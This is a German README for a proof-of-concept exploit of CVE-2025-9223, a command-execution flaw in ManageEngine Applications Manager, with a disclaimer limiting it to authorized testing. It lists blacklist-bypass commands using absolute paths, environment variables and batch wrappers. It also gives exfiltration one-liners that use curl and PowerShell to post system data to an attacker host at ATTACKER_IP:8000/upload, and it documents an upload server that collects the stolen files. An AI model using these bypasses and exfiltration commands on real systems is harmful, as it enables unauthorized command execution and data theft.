
POC CVE-2025-9223
Dieses Repository enthält einen Proof of Concept (PoC), der eine Schwachstelle bei der Ausführung von Befehlen in der Funktion "Execute Program Action" von ManageEngine Applications Manager demonstriert.
Applications Manager verwendet eine Blacklist (BlackListCommands), um gefährliche Befehle zu blockieren, aber die Validierung weist kritische Schwachstellen auf:
| Methode | Beispiel |
|---|---|
| Absoluter Pfad | C:\Windows\System32\netstat.exe |
| Umgebungsvariablen | %SystemRoot%\System32\netstat.exe |
| Skript-Wrapper | echo netstat > a.bat && a.bat |
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload
Das Skript upload_server.py stellt einen einfachen HTTP-Server bereit, um exfiltrierte Dateien zu empfangen.
python3 upload_server.py
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads
--host: Bindungsadresse (Standard: 0.0.0.0)--port: HTTP-Port (Standard: 8000)--dir: Ausgabeverzeichnis (Standard: aktuelles Verzeichnis)✅ Schutz vor Path Traversal
✅ Eindeutige Dateinamen mit Zeitstempel
✅ Protokollierung von Anfragen mit IP und User-Agent
✅ Validierung des Inhaltstyps
Erstelle eine Datei test_commands.txt mit Bypass-Beispielen:
# Bypass mit absolutem Pfad
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an
# Bypass mit Umgebungsvariablen
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe
# Bypass mit Skript-Wrapper
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat
# Beispiele für Datenexfiltration
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"
WICHTIG: Dieses Tool dient ausschließlich Bildungszwecken und autorisierten Tests.
❌ NICHT auf Systemen verwenden, die dir nicht gehören oder für die du keine ausdrückliche Testgenehmigung hast
❌ NICHT für illegale Aktivitäten verwenden
✅ DOCH nur in kontrollierten Umgebungen für Sicherheitsforschung verwenden
✅ DOCH vor Tests eine angemessene Autorisierung einholen
Der Autor ist nicht verantwortlich für jegliche missbräuchliche Verwendung dieses Tools. Die Benutzer übernehmen die volle Verantwortung und das gesamte Risiko.
Dieses Projekt dient nur Forschungs- und Bildungszwecken. Alle Rechte vorbehalten.
Johan Aybar - Zu Bildungszwecken
⚠️ ERINNERUNG: Dieser PoC darf nur in autorisierten Testumgebungen verwendet werden. Unbefugte Nutzung kann illegal sein und ist strengstens untersagt.
| Methode | Endpunkt | Beschreibung |
|---|
| GET | / | Listet kürzlich hochgeladene Dateien auf |
| POST | /upload | Lädt Dateien hoch (multipart/form-data) |
| PUT | /upload/[filename] | Direktes Hochladen von Dateien |